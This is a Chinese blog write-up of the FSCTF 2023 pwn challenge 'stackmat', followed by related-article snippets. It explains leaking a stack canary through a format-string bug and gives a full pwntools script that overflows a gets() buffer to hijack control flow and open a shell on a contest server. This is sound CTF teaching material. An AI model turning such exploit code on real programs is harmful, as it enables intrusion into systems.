【pwn】[FSCTF 2023]stackmat --格式化字符串漏洞泄露canary

最新推荐文章于 2025-03-23 09:40:01 发布

原创最新推荐文章于 2025-03-23 09:40:01 发布 · 252 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#c语言 #安全 #网络安全 #python

本文介绍了在程序中发现的格式化字符串漏洞和栈溢出，通过frompwn库，作者利用这些漏洞构造payload，成功实现对远程服务器的控制并进入交互模式。

看一下程序的保护状态

开了canary，接着看一下代码逻辑

可以发现，这里有格式化字符串漏洞，同时gets函数有栈溢出漏洞，现在只需要确定我们输入到buf的内容在格式化字符的第几个参数就行

可以确定buf在格式化字符串的第8个参数，又因为buf的偏移是0x20,所以canary在11个参数，因为canary的偏移是0x8

exp：

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

io=remote("node4.anna.nssctf.cn",28679)

io.recvuntil(b"Do you kown canary\n")

io.send(b"AAAAAAAA%11$p")

io.recvuntil(b'0x')

canary=int(io.recv(16),16)

ret=0x40101a

io.recvuntil(b"overflow\n")

payload=b'a'*(0x30-0x8)+p64(canary)+b'a'*8+p64(0x401240)

io.send(payload)

io.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

GGb0mb

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

PWN基础-利用格式化字符串漏洞泄露canary结合栈溢出getshell

Welcome To My6n Blog

04-27

740

canary 所在地址为 0xffffcffc，内容为 0xe8ac1700。然后运行，期间会经过第一个 read 函数，随便输入：RRR。再看一下 canary 距离我们输入字符串的距离，偏移是 8。重新运行 canary 值会变：现在是 0x37133900。继续往下走，可以发现打印出的值就是 canary 的值。p 只显示了地址，x 还显示了地址处的内容。我们在栈上面找一下 0xe8ac1700。但是测试发现，输出结果多了一个换行符。这部分后面需要填充为垃圾数据。距离栈顶偏移值为 15。

pwn刷题num17-----格式化字符串泄露canary+栈溢出

tbsqigongzi的博客

04-23

1449

攻防世界pwn进阶区Mary_Morton 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位，小端序开启部分RELRO---got表仍可写开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行未开启PIE----程序地址为真实地址动态链接运行后，选1是栈溢出，选2是格式化字符串溢出，选3是退出程序 ida一下主函数简单的程序，三种选择，选1进入stack（）函数 buf占0x90字节，read函数读入0x100字节，寻找

参与评论您还未登录，请先登录后发表或查看评论

PWN——格式化字符串泄露canary

djhtdjdywgjc的博客

11-19

2226

格式化字符串泄露canary

栈上格式化字符串漏洞：泄露canary，修改got表，stack check fail，one_gadget

2302_79813730的博客

02-05

1145

此时就存在格式化字符串漏洞。%c为单个字符形式%s为多个字符形式%d为数字形式%f是转为浮点型%x是转为十六进制形式，不带0x%p是转为十六进制，但是带0x%n 将%n之前打印出来的字符的个数存入到参数中接下通过例题来讲解利用方法。

PWN做题笔记11-Mary_Morton（格式化字符串暴露canary）

qq_40923256的博客

05-15

574

Mary_Morton，知识点是格式化字符串漏洞暴露canary

FSCTF 2023（公开赛道）（pwn持续更新中）

沈理大学牲的博客

11-28

790

file一下，64位，ida打开关键函数部分：检查用户输入的命令中是否包含"cat"、"flag"、"sh"或者"$0"这些关键词，如果包含，则输出"invalid command"；否则关闭标准输出，然后调用backdoor函数。在backdoor函数中system(a1);存在，a1是buf也就是输入的我也是看了wp才知道的，还得多练直接 nc node4.anna.nssctf.cn 28229然后输入 tac fla* >&2。

android 分钟秒计时器_开发记录：连接Stackmat计时器

weixin_35945480的博客

01-28

846

阅读本文大约需要5分钟；如需节省时间可先看结论：还得再等等。一、Android 篇大约在0.6版的时候增加了连接ss计时器功能，那时候的手机大多都比较简单没有降噪之类的功能，作者本人使用某TC的Android系统2.3手机，加上一个手机音频麦克风分线器就可以获取ss计时器的音频信号，波形看上去非常完美。后面的手机功能越来越多，现在也几乎找不到不带降噪功能的Android设备，信号被降噪后...

[CTF]PWN--手搓格式化字符串漏洞

2301_79880752的博客

02-19

1723

而是，原来我们修改了的其实是0x7f1与0x7f2里的东西，那后面我们就需要修改0x7f3与0x7f4里的东西，因此我们+2的意思就是将原来的0x7f1+2，修改成0x7f3，这样，我们在修改的时候改的就是0x7f3与0x7f4里的东西了（思路是这样的，一个栈地址一共八个字节，我们需要将要修改的地址和被修改的地址每两个字节对应的修改，直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的，由于栈里面的地址与libc里面的地址一般都只占6个字节，因此，我们只需要进行三次修改即可。

pwn刷题num26-----格式化字符串漏洞实现任意地址修改

tbsqigongzi的博客

04-27

571

BUUCTF-PWN-[第五空间2019 决赛]PWN5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序，小端序开启部分RELRO-----got表可写开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行未开启PIE-----程序地址为真实地址动态链接程序运行后首先输入一个name 然后输入密码（passwd）最后fail ida看一下伪代码观察主函数，发现格式化字符串漏洞 printf(&buf);

BUUCTF-PWN刷题记录-18（格式化字符串漏洞）

weixin_44145820的博客

05-08

2085

目录xman_2019_format（字符串位于堆上）hitcontraining_playfmt（字符串位于bss）wustctf2020_babyfmt xman_2019_format（字符串位于堆上）一道格式化字符串题目，但是只有一次输入机会，但是有多次利用机会，每次利用使用‘|’隔开我们先看一下栈的情况经过多次调试，可以发现返回地址最低一个16进制位一定为0xC，我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =

[深育杯 2021]find_flag wp(绕过PIE和canary 格式化字符串 栈溢出 )

qq_73667990的博客

06-28

914

直接跳到格式化字符串漏洞处，然后查看栈结构，rbp上下分别是canary和返回地址。所以我们要输入0x40-0x8来把v2到canary填充完，然后再原封不动的输入canary，然后再输入0x8个a填充rbp指针，然后再输入后门函数地址覆盖返回地址。所以我们栈的第一个位置其实是rdi，所以canary和return的位置分别为17和19，我们输入。开了canary保护，栈溢出时，要还原canary，开了PIE，地址会改变。有了返回地址，我们减去偏移就能得到程序基地址，返回地址偏移为0x146F。

FSCTF 2023 PWN

Xzzzz911的博客

10-26

1053

FSCTF新生赛是由中国民航大学、天津理工大学、滁州学院、吉林师范大学、三明学院(排名不分先后)等5所高校共同举办的CTF新生赛，比赛涵盖Web、Pwn、Reverse、Crypto、Misc等赛题方向。通过此次比赛，希望能够提高参赛师傅们的实践能力，促进进一步学习竞赛知识的热情，并为大家提供一个展示自我、交流合作的平台。完结撒花！！！

格式化字符串漏洞的两种利用姿势+orw沙盒利用

2301_79880074的博客

02-03

1075

通过三道例题学习一下格式化字符串漏洞和orw（沙盒），所有例题需要附件可以私信我。

Canary

Sean_summer的博客

03-18

568

Canary是一种用以防护栈溢出的保护机制。

格式化字符串泄露canary+ret2libc

qq_41710399的博客

03-23

1054

264/8=33，因为是六十四位文件所以他格式化字符串时候前六个参数是在寄存器中的而栈空间这个记录的第一个偏移其实是真实的第七个数据单元所以这边算出来33还要再加6，即为canary值，利用格式化字符串泄露内存的payload应该为(%39$p)接下来再本地run一下看看。这边泄露出来libc基地址需要用puts真实地址减去偏移量，即为基地址，每次运行程序偏移量是不变的是固定的所以这边可以利用动调获取到puts的真实地址和基地址计算偏移量，这边有两个函数。

pwn学习---借助格式化输出绕过canary保护

gclome的博客

03-29

640

0x01 原理简介 格式化字符串漏洞是因为c语言中printf的参数个数不是确定的，参数的长度也不是确定的，当printf把我们的输入当作第一个参数直接输出的时候，我们输入若干格式化字符串，会增加与格式化字符串相对应的参数，会泄露出栈中的内容 Stack canary保护机制在刚进入函数时，在栈上放置一个标志canary，然后在函数结束时，判断该标志是否被改变，如果被改变，则表示有攻击行为发生。...

pwn1 格式化字符串泄露canary

qq_44832048的博客

07-27

985

前面在终端中查看保护机制和32位在前面提到过就不讲了，只不过在这里只开启了Canary，所以我们可以用格式化字符串漏洞泄露出栈上保存的Canary，没有开启NX，说明堆栈可执行，我们可以在第二次输入中直接把shellcode布置到栈里面，然后返回到栈里用ida简单看了一下，就是让你输入名字，然后调用get_message函数输出你的名字，让你留言，留言有溢出漏洞，显然用了printf，也有...

从格式化字符串泄露canary到栈溢出

SsMing的博客

01-11

4474

以ASIS-CTF-Finals-2017 Mary_Morton为例 checksec查看，开了NX保护，还有canary IDA打开 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi int v4; // [rsp+24h] [rbp-Ch] ...

格式化字符串漏洞泄露StackCanary

ACdream

04-26

3150

2017陕西省的pwn_box这个题作为调试的程序，gdb作为工具先来熟悉原理，推荐几个pdf学习懂原理吧： Format String Exploitation-Tutorial By Saif El-Sherei Exploiting Format String Vulnerabilities scut/team teso 看完这几个会对原理有深刻认识，然后如何操作呢？戳我

[CTF]PWN--非栈上格式化字符串漏洞

最新发布

08-14